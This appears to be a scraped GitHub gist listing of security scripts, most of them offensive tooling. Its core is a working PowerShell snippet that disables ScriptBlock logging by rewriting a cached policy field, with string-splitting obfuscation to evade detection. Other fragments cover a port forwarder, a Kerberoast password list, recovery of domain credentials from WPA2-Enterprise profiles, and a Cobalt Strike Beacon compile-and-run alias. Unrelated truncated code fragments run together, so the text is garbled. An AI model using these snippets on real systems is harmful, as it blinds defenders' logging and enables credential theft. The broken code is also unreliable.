CaledoniaProject / ScriptBlockLogBypass.ps1
Created November 26, 2018 03:10 — forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
# Reflectively obtain the private static field 'cachedGroupPolicySettings' on
# System.Management.Automation.Utils, reached through the assembly that defines [ref].
# The split literals ('N'+'onPublic', 'ScriptB'+'lockLogging' below) and the escaped
# method name ("GetFie`ld") keep the plain tokens out of the script text - apparently to
# dodge simple signature matching on logged script blocks.
# NOTE(review): the code below only rewrites an in-process cache, so it can only affect
# script blocks compiled after it runs; this block itself is presumably already logged by
# the time it executes - confirm before relying on it for evasion or detection testing.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
#.\portfwd.ps1 127.0.0.1 8080 192.168.1.100 80
# launchable by standard user
$mycode = @"
//based on : https://blog.brunogarcia.com/2012/10/simple-tcp-forwarder-in-c.html
using System;
using System.Net;
using System.Net.Sockets;
# https://www.patreon.com/posts/when-messages-18714633
import os
import sys
import sqlite3
import datetime
import platform
import tempfile
import Foundation
CaledoniaProject / kerberoast_pws.xz
Last active November 14, 2018 05:11 — forked from edermi/kerberoast_pws.xz
edermi Kerberoast PW list (XZ format)
CaledoniaProject / doh_test.sh
Created November 10, 2018 15:38 — forked from dtmsecurity/doh_test.sh
DNS over HTTPS (DoH) Resolver GET Test Script
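#!/bin/bash
# Query three public DNS-over-HTTPS resolvers for the AAAA record of example.com over
# the JSON GET API (accept: application/dns-json) and print each raw response between
# START/END markers.
#
# TLS certificate verification is deliberately left enabled (no curl -k): a DoH check
# that only passes with verification disabled tells you nothing about whether the
# resolver you reached is the genuine one, and an on-path attacker could answer instead.
# Behind a TLS-intercepting proxy, trust its CA explicitly with --cacert <file> rather
# than turning verification off. The 1.1.1.1 endpoint is addressed by IP, so it relies
# on the server certificate carrying that IP as a SAN - if that query fails to validate,
# investigate the path rather than re-adding -k.
printf "===START dns.google.com===\n"
curl -H "accept: application/dns-json" "https://dns.google.com/resolve?name=example.com&type=AAAA"
printf "\n===END dns.google.com===\n"
printf "===START cloudflare-dns.com===\n"
curl -H "accept: application/dns-json" "https://cloudflare-dns.com/dns-query?name=example.com&type=AAAA"
printf "\n===END cloudflare-dns.com===\n"
printf "===START 1.1.1.1===\n"
curl -H "accept: application/dns-json" "https://1.1.1.1/dns-query?name=example.com&type=AAAA"
printf "\n===END 1.1.1.1===\n"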
CaledoniaProject / Get-WlanEnterprisePassword.ps1
Created November 10, 2018 15:11
Get-WlanEnterprisePassword
# Original post (PowerShell comments use '#'; '//' is not a comment and would fail to parse)
# https://0x00-0x00.github.io/research/2018/11/06/Recovering-Plaintext-Domain-Credentials-From-WPA2-Enterprise-on-a-compromised-host.html
function Get-String
{
Param(
[Parameter(Mandatory = $true, Position = 0)]
[byte[]]$InputStream
)
[byte[]]$Output = @();
CaledoniaProject / sharpgen.cna
Created November 9, 2018 00:29 — forked from dtmsecurity/sharpgen.cna
SharpGen Aggressor Beacon Wrapper
# Team-server-side paths used by the sharpgen alias below; adjust to your install.
# dotnet CLI that drives SharpGen.
$dotnetpath = "/usr/local/share/dotnet/dotnet";
# SharpGen build output (Debug build targeting netcoreapp2.1).
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
# Directory that receives the generated .cs source and the compiled .exe.
# NOTE(review): /tmp is shared and world-writable, and the alias below names its
# artifacts "sharpgen_<rand>" - on a multi-user team server consider a private,
# operator-owned directory so other local users cannot read or swap the payload.
$temppath = "/tmp/";
# Expose "sharpgen" as a Beacon console command.
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");
alias sharpgen{
$executionId = "sharpgen_" . int(rand() * 100000);
$temporaryCsharp = $temppath . $executionId . ".cs";
$executableFilename = $temppath . $executionId . ".exe";
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
namespace ComAbandonment
{
public class ComAbandonment
{
CaledoniaProject / windows_hardening.cmd
Created November 1, 2018 08:09 — forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS
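::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
::
:: Inside a batch file a bare %1 expands to the script's own first argument (normally
:: empty), so the placeholder must be written as %%1 to store a literal "%1" in the
:: association; otherwise the stored command has no file placeholder at all.
:: ftype writes under HKEY_CLASSES_ROOT, so run this from an elevated prompt.
:: %SystemRoot% is expanded when the script runs, which is intended: the stored
:: command then points at this machine's notepad.exe.
:: This only changes what the shell launches on open/double-click; a script invoked
:: explicitly (cmd /c x.bat, cscript x.vbs, mshta x.hta) is presumably still executed,
:: so treat it as friction against drive-by execution rather than a block.
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%%1"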
//this requires being able to run at kernel mode and assumes you're using MSVC
//this also uses an unnamed structure for cr0_t, which is a nonstandard extension of the C language
//data structure for cr0
typedef union _cr0_t
{
struct
{
uint64_t protection_enable : 1;